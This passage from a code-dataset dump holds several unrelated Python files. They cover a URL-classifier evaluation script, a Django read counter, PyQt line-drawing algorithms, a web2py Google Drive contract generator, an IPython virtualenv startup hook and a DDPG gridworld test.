'%')\nprint(\"False Positive Rate: \" + false_positive_rate + '%')\nprint(\"False Negative Rate: \" + false_negative_rate + '%')\nprint(\"Precision of model: \" + precision)\n\n\n# Calculate and print ROC curve\nmean_tpr = np.mean(tprs, axis=0)\nmean_tpr[-1] = 1.0\nmean_auc = auc(mean_fpr, mean_tpr)\nstd_auc = np.std(aucs)\nplt.plot(mean_fpr, mean_tpr, color='b',\n label=r'Mean ROC (AUC = %0.2f $\\pm$ %0.2f)' % (mean_auc, std_auc),\n lw=2, alpha=.8)\n\nstd_tpr = np.std(tprs, axis=0)\ntprs_upper = np.minimum(mean_tpr + std_tpr, 1)\ntprs_lower = np.maximum(mean_tpr - std_tpr, 0)\nplt.fill_between(mean_fpr, tprs_lower, tprs_upper, color='grey', alpha=.2,\n label=r'$\\pm$ 1 std. dev.')\n\nplt.xlim([-0.05, 1.05])\nplt.ylim([-0.05, 1.05])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('Receiver Operating Curve Random Forest URL Prediction \\n with accuracy of ' + average + ' percent')\nplt.legend(loc=\"lower right\")\nplt.savefig(roc_file)\n\n# Plot the Confusion Matrix\nplt.title('Confusion Matrix Random Forest URL Prediction \\n with accuracy of ' + average + ' percent')\nfig, ax = plot_confusion_matrix(conf_mat=matrix_sum, figsize=(10, 5))\nplt.savefig(confusion_matrix_file)\n\n\n# dump the model for later use\n\npickle.dump(forest, open(forest_saved_file, 'wb'))\n\n","sub_path":"randomForest.py","file_name":"randomForest.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"60104804","text":"# pork_suimai/apps/diy_count/templatetags/count_tag.py\nfrom django import template\nfrom ..models import ReadNum\nregister = template.Library()\n\n# 文章详情内使用\n@register.simple_tag\ndef get_read_detail(request, obj):\n key = \"%s_read\" % (obj.slug)\n read_num, created = ReadNum.objects.get_or_create(slug_name=obj.slug)\n if not request.COOKIES.get(key) and request.user != obj.author: # 如果客户端请求中没有key这个cookie\n '''get_or_create是django的内置方法,获取或创建\n 这里整个函数的目的是,获取到请求,如果没有key这个cookie,阅读数加一,并返回阅读数\n 如果有这个cookice,则直接返回阅读数 \n '''\n read_num.read_detail_num += 1\n read_num.save()\n get_read_num = ReadNum.objects.get(slug_name=obj.slug).read_detail_num\n return get_read_num\n\n# 文章列表和其它地方使用\n@register.simple_tag\ndef read_count_tag(slug):\n list_read_num = ReadNum.objects.get(slug_name=slug).read_detail_num\n\n return list_read_num","sub_path":"apps/diy_count/templatetags/count_tag.py","file_name":"count_tag.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"560395879","text":"class Status:\n projects, invest = [], []\n NPV, E, D = 0, 0, 0\n\n def __init__(self, prj: list, data):\n self.projects = prj\n invest = [0] * len(data['period'])\n i = 0\n for pr in self.projects:\n if pr != -1:\n period = pr + data[\"projects\"][i][\"lenght\"]\n count = pr\n for inv in invest:\n # считать INV с учетом интервальности\n inv = data['projects'][i][count - pr]\n if count < period:\n break\n #считать NPV с учетом интервальности\n NPV = NPV + data['projects'][i][pr]\n #посчитать МО и ДИСП\n i = i + 1\n\n\ndef gray(self, time: int, change: list, base_list: list, k=0):\n if k == len(change):\n self.convert(base_list, change)\n else:\n change[k] = -1\n self.gray(time, change, base_list, k + 1)\n change[k] = time\n self.r_gray(time, change, base_list, k + 1)\n\n\ndef r_gray(self, time: int, change: list, base_list: list, k=0):\n if k == len(change):\n self.convert(base_list, change)\n else:\n change[k] = time\n self.gray(time, change, base_list, k + 1)\n change[k] = -1\n self.r_gray(time, change, base_list, k + 1)","sub_path":"invest/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"246338113","text":"from tkinter import *\nimport tkinter.filedialog\nimport sys\nfrom PyQt5.QtWidgets import (QFileDialog, QAbstractItemView, QListView,QTreeView, QApplication, QDialog)\nfrom os import listdir\nfrom os.path import isfile, join\n\nroot = Tk()\nroot.withdraw()\n\nautoFolder = 1\n\nrois = []\nbackground = []\nneuron = []\n\nmsgBox = 'yes'\n\nif autoFolder == 0:\n#Select files\n\twhile msgBox == 'yes':\n\t\trois.append(root.tk.splitlist(tkinter.filedialog.askopenfilenames(initialdir='C:/Users/Diana/Desktop/Data/',title='choose your rois')))\n\t\tbackground.append(tkinter.filedialog.askopenfilename(initialdir=rois[-1],title='choose your background'))\n\t\tneuron.append(tkinter.filedialog.askopenfilename(initialdir=rois[-1],title='choose your neuron'))\n\t\tmsgBox = messagebox.askquestion ('Add data','Do you want to add data?',icon = 'warning')\nelse:\n#Select directories to go faster\n\tclass getExistingDirectories(QFileDialog):\n\t\tdef __init__(self, *args):\n\t\t\tsuper(getExistingDirectories, self).__init__(*args)\n\t\t\tself.setOption(self.DontUseNativeDialog, True)\n\t\t\tself.setFileMode(self.Directory)\n\t\t\tself.setOption(self.ShowDirsOnly, True)\n\t\t\tself.findChildren(QListView)[0].setSelectionMode(QAbstractItemView.ExtendedSelection)\n\t\t\tself.findChildren(QTreeView)[0].setSelectionMode(QAbstractItemView.ExtendedSelection)\n\n\tqapp = QApplication(sys.argv)\n\tdlg = getExistingDirectories()\n\tif dlg.exec_() == QDialog.Accepted:\n\t\tfor dir in dlg.selectedFiles():\n\t\t\troi = []\n\t\t\tonlyfiles = [f for f in listdir(dir) if isfile(join(dir, f))]\n\t\t\tfor f in onlyfiles:\n\t\t\t\t#take off the '.avi'\n\t\t\t\tnoAVI = f.split('.')[0]\n\t\t\t\t#do not process the file neuron\n\t\t\t\tif noAVI != 'neuron':\n\t\t\t\t\tlast1 = noAVI.split('_')[-1]\n\t\t\t\t\t#select as background if only one number at the end of the file name\n\t\t\t\t\tif (len(last1)==1):\n\t\t\t\t\t\tbackground.append(dir+'/'+f)\n\t\t\t\t\telse :\n\t\t\t\t\t\tlast2 = last1.split('-')[-1]\n\t\t\t\t\t\tif len(last2) == 2:\n\t\t\t\t\t\t\troi.append(dir+'/'+f)\n\t\t\t\t\t\telif len(last2) == 3:\n\t\t\t\t\t\t\tneuron.append(dir+'/'+f)\n\t\t\t\t\t\t\t\n\t\t\trois.append(roi)","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"108012044","text":"from math import radians, cos, sin\nfrom PyQt5.QtCore import QPoint, QSize, Qt\nfrom PyQt5.QtGui import (QPainter, QPixmap, QPalette, QPen)\nfrom PyQt5.QtWidgets import (QApplication, QGridLayout, QGroupBox,\n QVBoxLayout, QComboBox, QLabel, QWidget,\n QPushButton, QLineEdit, QMessageBox, QRadioButton)\n\n\ndef sign(x):\n if x > 0:\n return 1\n elif x < 0:\n return -1\n else:\n return 0\n\n\ndef alg_b_whole_numb(painter, xn, yn, xk, yk):\n\n # В процессе работы одна из координат - либо х,\n # либо у(в зависимости от углового коэффициента) - изменяктся на единицу.\n # Изменение другой координаты ( либо на нуль, либо на единицу)\n # зависит от расстояния между действительным положением отрезка и\n # ближайшими координатными сетками.\n\n # 0.5 <= dy/dx <= 1 (ошибка >= 0)\n # 0 <= dy/dx < 0.5 (ошибка < 0)\n\n # Нужно проверять только знак ошибки\n # ошибка >= 0 - подняться на пиксель\n # ошибка < 0 - не изменяться\n\n x = xn\n y = yn\n\n dx = xk - xn\n dy = yk - yn\n\n sx = sign(dx)\n sy = sign(dy)\n\n dx = abs(dx)\n dy = abs(dy)\n\n flag = 0\n\n if not (dx > dy):\n flag = 1\n dx, dy = dy, dx\n\n e = 2 * dy - dx\n\n for i in range(dx + 1):\n painter.drawPoint(QPoint(x, y))\n\n if e >= 0:\n if flag == 0:\n y += sy\n else:\n x += sx\n\n e -= 2 * dx\n\n if flag == 0:\n x += sx\n else:\n y += sy\n\n e += 2 * dy\n\n\ndef alg_b_real_numb(painter, xn, yn, xk, yk):\n # В процессе работы одна из координат - либо х,\n # либо у(в зависимости от углового коэффициента) - изменяктся на единицу.\n # Изменение другой координаты ( либо на нуль, либо на единицу)\n # зависит от расстояния между действительным положением отрезка и\n # ближайшими координатными сетками.\n\n # 0.5 <= dy/dx <= 1 (ошибка >= 0)\n # 0 <= dy/dx < 0.5 (ошибка < 0)\n\n # Нужно проверять только знак ошибки\n # ошибка >= 0 - подняться на пиксель\n # ошибка < 0 - не изменяться\n\n # ошибка - это интервал, отсекаемый рассматриваемым отрезком\n # в каждом растровом элементе\n\n x = xn\n y = yn\n\n dx = xk - xn\n dy = yk - yn\n\n sx = sign(dx)\n sy = sign(dy)\n\n dx = abs(dx)\n dy = abs(dy)\n\n flag = 0\n\n if not (dx > dy):\n flag = 1\n dx, dy = dy, dx\n\n # угловой коэффициент\n m = dy / dx\n # значение ошибки\n e = m - 0.5\n\n for i in range(dx + 1):\n painter.drawPoint(QPoint(x, y))\n\n if e >= 0:\n if flag == 0:\n y += sy\n else:\n x += sx\n\n e -= 1\n \n if flag == 0:\n x += sx\n else:\n y += sy\n\n e += m\n\n\ndef alg_b_modified(painter, xn, yn, xk, yk):\n\n # Идея состоит в сглаживании резких переходов от ступени к ступени.\n # Сглаживание основывается на том, что каждый пиксель высвечивается\n # со своим уровнем интенсивности.\n # Уровень выбирается пропорционально площади части пикселя.\n\n # Интенсивность I~Si площади\n\n I = 255 # Число доступных уровней интенс��вности\n\n x = xn\n y = yn\n\n dx = xk - xn\n dy = yk - yn\n\n sx = sign(dx)\n sy = sign(dy)\n\n dx = abs(dx)\n dy = abs(dy)\n\n flag = 0\n\n if not (dx > dy):\n flag = 1\n dx, dy = dy, dx\n\n # Тангенса угла наклона\n m = dy / dx\n\n # Весовой коэффициент\n W = 1 - m\n\n # Ошибка\n e = 0.5\n\n a = round(I * e)\n\n # plot(X, Y, m / 2);\n pen = painter.pen()\n color = pen.color()\n color.setAlpha(a)\n\n pen.setColor(color)\n painter.setPen(pen)\n\n painter.drawPoint(QPoint(x, y))\n\n for i in range(dx + 1):\n\n pen = painter.pen()\n color = pen.color()\n color.setAlpha(a)\n\n pen.setColor(color)\n painter.setPen(pen)\n\n painter.drawPoint(QPoint(x, y))\n\n if e < W:\n if flag:\n y += sy\n else:\n x += sx\n e += m\n else:\n y += sy\n x += sx\n e 
-= W\n\n a = round(I * e)\n\n\ndef alg_cda(painter, xn, yn, xk, yk):\n\n # Take the larger of the increments dx and dy to be one raster unit\n\n if abs(xk - xn) >= abs(yk - yn):\n l = abs(xk - xn)\n else:\n l = abs(yk - yn)\n\n # l - the length\n\n # Rounding\n\n px = round((xk - xn) / l)\n py = round((yk - yn) / l)\n\n # Use the sign function to handle the different quadrants\n\n x = xn + 0.5 * sign(px)\n y = yn + 0.5 * sign(py)\n\n i = 1\n\n while i <= l:\n painter.drawPoint(QPoint(x, y))\n x += px\n y += py\n i += 1\n\n\ndef alg_lib(painter, xn, yn, xk, yk):\n painter.drawLine(xn, yn, xk, yk)\n\n\nclass RenderArea(QWidget):\n\n def __init__(self):\n super().__init__()\n\n self.points = None\n\n self.algorithm = alg_b_real_numb\n self.algorithms = {0: alg_b_real_numb,\n 1: alg_b_whole_numb,\n 2: alg_b_modified,\n 3: alg_cda,\n 4: alg_lib}\n\n self.color = Qt.black\n self.colors = {0: Qt.black,\n 1: Qt.red,\n 2: Qt.green,\n 3: Qt.blue,\n 4: Qt.yellow}\n\n self.pixmap = QPixmap(self.size()).scaled(800, 600, Qt.IgnoreAspectRatio)\n self.pixmap.fill(Qt.transparent)\n\n self.setBackgroundRole(QPalette.Base)\n self.setAutoFillBackground(True)\n\n def minimumSizeHint(self):\n return QSize(800, 600)\n\n def sizeHint(self):\n return QSize(800, 600)\n\n def clean_all(self):\n self.pixmap = QPixmap(self.size())\n self.pixmap.fill(Qt.transparent)\n\n self.update()\n\n def createSun(self, col, alg):\n\n xb = self.width() / 4\n xe = xb * 3\n\n yb = self.height() / 2\n ye = self.height() / 2\n\n xc = self.width() / 2\n yc = self.height() / 2\n\n fi = 30\n \n for i in range(12):\n self.createLine(round(xb), round(yb), round(xe), round(ye), col, alg)\n \n new_x = xc + (xb - xc)*cos(radians(fi)) + (yb - yc)*sin(radians(fi)) \n new_y = yc - (xb - xc)*sin(radians(fi)) + (yb - yc)*cos(radians(fi))\n xb = new_x\n yb = new_y\n\n new_x = xc + (xe - xc)*cos(radians(fi)) + (ye - yc)*sin(radians(fi)) \n new_y = yc - (xe - xc)*sin(radians(fi)) + (ye - yc)*cos(radians(fi))\n xe = new_x\n ye = new_y\n\n def createLine(self, xb, yb, xe, ye, color, alg):\n self.color = self.colors[color]\n self.points = [(xb, yb,), (xe, ye)]\n self.algorithm = self.algorithms[alg]\n\n self.drawLine()\n\n def drawLine(self):\n p = QPainter(self.pixmap)\n pen = QPen(self.color)\n p.setPen(pen)\n self.algorithm(p, self.points[0][0], self.points[0][1],\n self.points[1][0], self.points[1][1])\n\n p.end()\n\n self.update()\n\n def paintEvent(self, event):\n painter = QPainter(self)\n painter.drawPixmap(QPoint(), self.pixmap)\n\n\nclass Window(QWidget):\n\n def __init__(self):\n super(Window, self).__init__()\n\n self.renderArea = RenderArea()\n\n self.alg = 0\n\n # Labels\n\n lineLabel = QLabel(\"Line\")\n lineLabel.setAlignment(Qt.AlignHCenter)\n beginLabel = QLabel(\"Coordinates of the line start.\")\n beginLabel.setAlignment(Qt.AlignHCenter)\n endLabel = QLabel(\"Coordinates of the line end.\")\n endLabel.setAlignment(Qt.AlignHCenter)\n\n # Edit\n\n self.xbEdit = QLineEdit()\n self.xbEdit.setFixedWidth(30)\n self.ybEdit = QLineEdit()\n self.ybEdit.setFixedWidth(30)\n self.xeEdit = QLineEdit()\n self.xeEdit.setFixedWidth(30)\n self.yeEdit = QLineEdit()\n self.yeEdit.setFixedWidth(30)\n\n # QComboBox\n\n self.colorComboBox = QComboBox()\n self.colorComboBox.addItem(\"Black\", 0)\n self.colorComboBox.addItem(\"Red\", 1)\n self.colorComboBox.addItem(\"Green\", 2)\n self.colorComboBox.addItem(\"Blue\", 3)\n self.colorComboBox.addItem(\"Yellow\", 4)\n\n colorLabel = QLabel(\"&Color:\")\n colorLabel.setAlignment(Qt.AlignRight)\n 
colorLabel.setBuddy(self.colorComboBox)\n\n # Radio Button\n\n rb_0 = QRadioButton('Bresenham algorithm\\n with real numbers')\n rb_0.setChecked(True)\n rb_0.toggled.connect(lambda: self.but_rest(0))\n rb_1 = QRadioButton('Bresenham algorithm\\n with integers')\n rb_1.toggled.connect(lambda: self.but_rest(1))\n rb_2 = QRadioButton('Bresenham algorithm\\n with anti-aliasing')\n rb_2.toggled.connect(lambda: self.but_rest(2))\n rb_3 = QRadioButton('CDA')\n rb_3.toggled.connect(lambda: self.but_rest(3))\n rb_4 = QRadioButton('Library algorithm')\n rb_4.toggled.connect(lambda: self.but_rest(4))\n\n # Buttons\n\n drawButton = QPushButton(\"Draw\")\n testButton = QPushButton(\"Test\")\n cleanButton = QPushButton(\"Clear\")\n\n # Connection\n\n drawButton.clicked.connect(self.drawButtonClicked)\n testButton.clicked.connect(self.testButtonClicked)\n cleanButton.clicked.connect(self.cleanButtonClicked)\n\n # layout\n\n mainLayout = QGridLayout()\n\n # Right Layout\n\n rightLayout = QGridLayout()\n rightLayout_2 = QGridLayout()\n\n rightLayout.addWidget(beginLabel, 0, 0, 1, 4)\n\n rightLayout.addWidget(QLabel(\"x = \"), 1, 0, Qt.AlignRight)\n rightLayout.addWidget(self.xbEdit, 1, 1) # , Qt.AlignRight)\n rightLayout.addWidget(QLabel(\"y = \"), 1, 2, Qt.AlignRight)\n rightLayout.addWidget(self.ybEdit, 1, 3) # , Qt.AlignRight)\n\n rightLayout.addWidget(endLabel, 2, 0, 1, 4)\n\n rightLayout.addWidget(QLabel(\"x = \"), 3, 0, Qt.AlignRight)\n rightLayout.addWidget(self.xeEdit, 3, 1) # , Qt.AlignRight)\n rightLayout.addWidget(QLabel(\"y = \"), 3, 2, Qt.AlignRight)\n rightLayout.addWidget(self.yeEdit, 3, 3) # , Qt.AlignRight)\n\n # right layout 2\n\n rightLayout_2.addWidget(colorLabel, 0, 0, 1, 1)\n rightLayout_2.addWidget(self.colorComboBox, 0, 1, 1, 3)\n rightLayout_2.addWidget(rb_0, 1, 0, 1, 4)\n rightLayout_2.addWidget(rb_1, 2, 0, 1, 4)\n rightLayout_2.addWidget(rb_2, 3, 0, 1, 4)\n rightLayout_2.addWidget(rb_3, 4, 0, 1, 4)\n rightLayout_2.addWidget(rb_4, 5, 0, 1, 4)\n\n # Group Box\n\n rightGB = QGroupBox(\"Coordinates\")\n rightGB.setLayout(rightLayout)\n\n rightGB_2 = QGroupBox(\"Parameters\")\n rightGB_2.setLayout(rightLayout_2)\n\n rW = QWidget()\n rl = QVBoxLayout()\n rl.addWidget(lineLabel)\n rl.addWidget(rightGB)\n rl.addWidget(rightGB_2)\n rl.addWidget(drawButton)\n rl.addWidget(testButton)\n rl.addWidget(cleanButton)\n rW.setLayout(rl)\n\n # Main Window\n\n mainLayout.setColumnStretch(0, 3)\n mainLayout.addWidget(self.renderArea, 0, 0, 4, 4)\n\n mainLayout.addWidget(rW, 0, 4) # rightGB, 0, 4)\n\n self.setLayout(mainLayout)\n\n self.setGeometry(500, 300, 800, 600)\n self.setWindowTitle(\"Lab_03\")\n\n def drawButtonClicked(self):\n\n try:\n xb = float(self.xbEdit.text())\n yb = self.renderArea.height() - float(self.ybEdit.text())\n xe = float(self.xeEdit.text())\n ye = self.renderArea.height() - float(self.yeEdit.text())\n\n color = self.colorComboBox.itemData(self.colorComboBox.currentIndex())\n\n self.renderArea.createLine(round(xb), round(yb),\n round(xe), round(ye), color, self.alg)\n\n except ValueError:\n msg = QMessageBox(self)\n msg.setIcon(QMessageBox.Critical)\n msg.setText(\"Invalid field values\")\n msg.setWindowTitle(\"Field input error\")\n msg.setStandardButtons(QMessageBox.Ok)\n msg.show()\n\n def testButtonClicked(self):\n color = self.colorComboBox.itemData(self.colorComboBox.currentIndex())\n self.renderArea.createSun(color, self.alg)\n \n def cleanButtonClicked(self):\n self.renderArea.clean_all()\n \n def but_rest(self, n):\n 
self.alg = n\n\n\nif __name__ == '__main__':\n import sys\n\n app = QApplication(sys.argv)\n window = Window()\n window.show()\n sys.exit(app.exec_())\n","sub_path":"Computer Graphics/lab_03/lab_03.py","file_name":"lab_03.py","file_ext":"py","file_size_in_byte":14028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"481320897","text":"def contrato_dependencia(matricula_id, dependencia_id):\n import json\n import os.path\n import io\n import pickle\n import pdfkit\n import datetime\n import time\n from weasyprint import HTML, CSS\n from apiclient import discovery\n from googleapiclient.http import MediaIoBaseDownload\n from googleapiclient.http import MediaFileUpload\n from httplib2 import Http\n from oauth2client import client\n from oauth2client import file\n from oauth2client import tools\n from google_auth_oauthlib.flow import InstalledAppFlow\n from google.auth.transport.requests import Request\n\n # dependencia_id = request.vars.dependencia_id\n\n usuario_id = auth.user.id\n pessoa = db(db.pessoa.usuario == usuario_id).select().first()\n\n dependencia = db(\n (db.dependencia.id == dependencia_id) &\n (db.matriz.id == db.dependencia.matriz) &\n (db.curso.id == db.matriz.curso) &\n (db.disciplina.id == db.dependencia.disciplina) &\n (db.dependencia.calendario == db.calendario.id) &\n (db.dependencia.preco == db.preco.id)\n ).select().first()\n\n print('aqui erro')\n print(dependencia_id)\n print(dependencia)\n\n folder = request.folder\n\n # Set the scopes and discovery info\n SCOPES = ['https://www.googleapis.com/auth/drive']\n\n TOKEN = os.path.join(os.path.join(folder, 'private','token.pickle'))\n CREDENTIALS = os.path.join(os.path.join(folder, 'private','credentials.json'))\n\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists(TOKEN):\n with open(TOKEN, 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n CREDENTIALS, SCOPES)\n creds = flow.run_local_server()\n\n # Save the credentials for the next run\n with open(TOKEN, 'wb') as token:\n pickle.dump(creds, token)\n\n drive_service = discovery.build('drive', 'v3', credentials=creds)\n docs_service = discovery.build('docs', 'v1', credentials=creds)\n\n contrato_dependencia = db(\n (db.contrato.tipo == 3) &\n (db.contrato.inicio_validade <= datetime.datetime.now()) &\n (db.contrato.fim_validade >= datetime.datetime.now())\n ).select().first()\n print(datetime.datetime.now())\n print(contrato_dependencia)\n # file_id = '1ogqWtDKWK7Yzv9kMCV_OjzXUnVQl6jdZCLdKoRgkEnY'\n file_id = contrato_dependencia.codigo_drive\n\n # customer_name = 'Alice'\n pasta_contatos_id = '18r1sUgnI_Y9Cu5ERhjkG4lkOwk_yb4nP'\n date = datetime.datetime.now().strftime(\"%y/%m/%d\")\n ano = datetime.datetime.now().strftime(\"%Y\")\n mes = datetime.datetime.now().strftime(\"%m\")\n\n curso_id = dependencia.curso.id\n\n calendario = db(\n (db.calendario.ano == ano) &\n (db.calendario.mes_inicio < mes) &\n (db.calendario.mes_fim > mes) &\n (db.calendario.nivel == 4) &\n (db.calendario.modalidade == 1)\n ).select().first()\n print(calendario)\n\n profissao = db(db.profissao.id == pessoa.profissao).select(db.profissao.nome).first()\n\n valor_parcela = dependencia.preco.valor\n parcelas = dependencia.preco.parcelamento\n\n numero_parcelas_extenso = extenso_normal(str(parcelas))\n reais_centavos = str(valor_parcela).split('.')\n reais = reais_centavos[0]\n centavos = reais_centavos[1]\n valor_parcela_extenso = extenso(reais, centavos)\n\n valor_total = valor_parcela * parcelas\n 
reais_centavos = str(valor_total).split('.')\n reais = reais_centavos[0]\n centavos = reais_centavos[1]\n valor_total_extenso = extenso(reais, centavos)\n\n requests = []\n requests.append(get_replace_field('pessoa.id', str(pessoa.id)))\n requests.append(get_replace_field('pessoa.nome', pessoa.nome + ' ' + pessoa.sobrenome))\n requests.append(get_replace_field('pessoa.cpf', pessoa.cpf))\n requests.append(get_replace_field('pessoa.rg', pessoa.rg))\n requests.append(get_replace_field('pessoa.endereco', pessoa.endereco))\n requests.append(get_replace_field('pessoa.numero', str(pessoa.numero)))\n requests.append(get_replace_field('pessoa.bairro', pessoa.bairro))\n requests.append(get_replace_field('pessoa.cidade', str(pessoa.cidade)))\n requests.append(get_replace_field('pessoa.uf', str(pessoa.uf)))\n requests.append(get_replace_field('pessoa.cep', pessoa.cep))\n requests.append(get_replace_field('pessoa.email', pessoa.email))\n requests.append(get_replace_field('pessoa.celular', pessoa.celular))\n requests.append(get_replace_field('pessoa.nome_social', ''))\n requests.append(get_replace_field('pessoa.nome_pai', pessoa.nome_pai))\n requests.append(get_replace_field('pessoa.nome_mae', pessoa.nome_mae))\n requests.append(get_replace_field('pessoa.nacionalidade', pessoa.nacionalidade))\n requests.append(get_replace_field('pessoa.profissao', profissao.nome))\n requests.append(get_replace_field('pessoa.estado_civil', pessoa.estado_civil))\n\n requests.append(get_replace_field('disciplina_dependencia', dependencia.disciplina.nome))\n requests.append(get_replace_field('curso', dependencia.curso.nome))\n requests.append(get_replace_field('habilitacao', dependencia.curso.descricao))\n requests.append(get_replace_field('semestre', '1' if dependencia.calendario.mes_inicio < 6 else '2' ))\n requests.append(get_replace_field('ano', str(dependencia.calendario.ano)))\n\n requests.append(get_replace_field('valor', str(valor_total)))\n requests.append(get_replace_field('valor_extenso', str(valor_total_extenso)))\n requests.append(get_replace_field('numero_parcelas', str(parcelas)))\n requests.append(get_replace_field('numero_parcelas_extenso', str(numero_parcelas_extenso)))\n requests.append(get_replace_field('valor_parcela', str(valor_parcela)))\n requests.append(get_replace_field('valor_parcela_extenso', str(valor_parcela_extenso)))\n\n # look up directories\n dir_contrato_id = '18r1sUgnI_Y9Cu5ERhjkG4lkOwk_yb4nP'\n\n # Look up the current year's folder\n dirs = drive_service.files().list(\n q=\"name='\"+ano+\"' and mimeType='application/vnd.google-apps.folder'\" \\\n \" and '\" +dir_contrato_id+ \"' in parents\"\n ).execute()\n\n # Create the current year's folder if it does not exist yet\n if not dirs.get('files'):\n dir_ano = drive_service.files().create(\n body={\n 'mimeType':'application/vnd.google-apps.folder',\n 'parents':[dir_contrato_id],\n 'name':str(ano)\n }\n ).execute()\n # create().execute() returns a dict, not an object\n dir_ano_id = dir_ano['id']\n else:\n dir_ano = dirs.get('files')\n dir_ano_id = dir_ano[0]['id']\n\n # Look up the course folder\n dirs = drive_service.files().list(\n q=\"name='\"+str(curso_id)+\"' and mimeType='application/vnd.google-apps.folder'\" \\\n \" and '\" +dir_ano_id+ \"' in parents\"\n ).execute()\n\n # Create the course folder if it does not exist yet\n if not dirs.get('files'):\n dir_curso = drive_service.files().create(\n body={\n 'mimeType':'application/vnd.google-apps.folder',\n 'parents':[dir_ano_id],\n 'name':str(curso_id)\n }\n ).execute()\n dir_curso_id = dir_curso['id']\n else:\n dir_curso = dirs.get('files')\n dir_curso_id = dir_curso[0]['id']\n\n\n new_file = drive_service.files().copy(\n body={\n 'fileId': file_id,\n 'mimeType':'application/vnd.google-apps.file',\n 'name':'contrato_'+str(pessoa.id)+'_'+str(matricula_id),\n 'parents':[dir_curso_id],\n # 'name': str(pessoa.nome + ' ' + pessoa.sobrenome)\n },\n fileId=file_id,\n ).execute()\n print ('File ID: %s' % new_file.get('id'))\n\n # replace the template fields\n result = docs_service.documents().batchUpdate(\n documentId=new_file.get('id'), body={'requests': requests}\n ).execute()\n\n documento_id = db.documento.insert(\n nome='contrato_'+str(pessoa.id)+'_'+str(matricula_id),\n arquivo=None,\n id_ged=None,\n codigo_drive=new_file.get('id')\n )\n\n db.contrato_matricula.insert(\n contrato=documento_id,\n contratante=pessoa.id,\n codigo_aceitacao=None,\n data_aceite=datetime.date.today(),\n )\n\n # set permissions\n permissao = drive_service.permissions().create(\n body={\n 'fileId': new_file.get('id'),\n 'role':'reader',\n 'type':'anyone',\n 'allowFileDiscovery':False,\n # 'emailAddress':''\n },\n fileId=new_file.get('id'),\n ).execute()\n\n\n\n\n return new_file.get('id')\n","sub_path":"exemplo-drive.py","file_name":"exemplo-drive.py","file_ext":"py","file_size_in_byte":8915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"220169018","text":"import os\nimport sys\n\nif 'VIRTUAL_ENV' in os.environ:\n py_version = sys.version_info[:2] # formatted as X.Y\n py_infix = os.path.join('lib', ('python%d.%d' % py_version))\n virtual_site = os.path.join(os.environ.get('VIRTUAL_ENV'), py_infix, 'site-packages')\n dist_site = os.path.join('/usr', py_infix, 'dist-packages')\n\n # OPTIONAL: exclude debian-based system distributions sites\n # sys.path = filter(lambda p: not p.startswith(dist_site), sys.path)\n\n # add virtualenv site\n sys.path.insert(1, virtual_site)\n","sub_path":"dotfiles/ipython/profile_default/startup/03-virtualenvs.py","file_name":"03-virtualenvs.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"391591168","text":"#!/usr/bin/env python3\n# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.\n\nimport random\nimport unittest\n\nimport numpy as np\nimport torch\nfrom ml.rl.test.gridworld.gridworld_base import DISCOUNT\nfrom ml.rl.test.gridworld.gridworld_continuous import GridworldContinuous\nfrom ml.rl.test.gridworld.gridworld_evaluator import GridworldDDPGEvaluator\nfrom ml.rl.test.gridworld.gridworld_test_base import GridworldTestBase\nfrom ml.rl.thrift.core.ttypes import (\n DDPGModelParameters,\n DDPGNetworkParameters,\n DDPGTrainingParameters,\n RLParameters,\n)\nfrom ml.rl.training.ddpg_trainer import DDPGTrainer\n\n\nclass TestGridworldDdpg(GridworldTestBase):\n def setUp(self):\n self.minibatch_size = 4096\n super(self.__class__, self).setUp()\n np.random.seed(0)\n random.seed(0)\n torch.manual_seed(0)\n\n def get_ddpg_parameters(self):\n return DDPGModelParameters(\n rl=RLParameters(\n gamma=DISCOUNT,\n target_update_rate=0.5,\n reward_burnin=100,\n maxq_learning=True,\n ),\n shared_training=DDPGTrainingParameters(\n minibatch_size=self.minibatch_size,\n final_layer_init=0.003,\n optimizer=\"ADAM\",\n ),\n actor_training=DDPGNetworkParameters(\n layers=[-1, 256, 128, -1],\n activations=[\"relu\", \"relu\", \"tanh\"],\n learning_rate=0.05,\n l2_decay=0.01,\n ),\n critic_training=DDPGNetworkParameters(\n layers=[-1, 256, 256, 128, -1],\n activations=[\"relu\", \"relu\", \"relu\", \"linear\"],\n learning_rate=0.05,\n l2_decay=0.01,\n ),\n )\n\n def _test_ddpg_trainer(self, use_gpu=False, use_all_avail_gpus=False):\n self.check_tolerance = False\n self.tolerance_threshold = 1.0\n environment = GridworldContinuous()\n trainer = DDPGTrainer(\n self.get_ddpg_parameters(),\n environment.normalization,\n environment.normalization_action,\n environment.min_action_range,\n environment.max_action_range,\n use_gpu=use_gpu,\n use_all_avail_gpus=use_all_avail_gpus,\n )\n evaluator = GridworldDDPGEvaluator(environment, DISCOUNT)\n self.evaluate_gridworld(environment, evaluator, trainer, trainer, use_gpu)\n\n def test_ddpg_trainer(self):\n self._test_ddpg_trainer()\n\n @unittest.skipIf(\n not torch.cuda.is_available() or True,\n \"CUDA not available; failing on CI for reason\",\n )\n def test_ddpg_trainer_gpu(self):\n self._test_ddpg_trainer(use_gpu=True)\n\n @unittest.skipIf(not torch.cuda.is_available(), 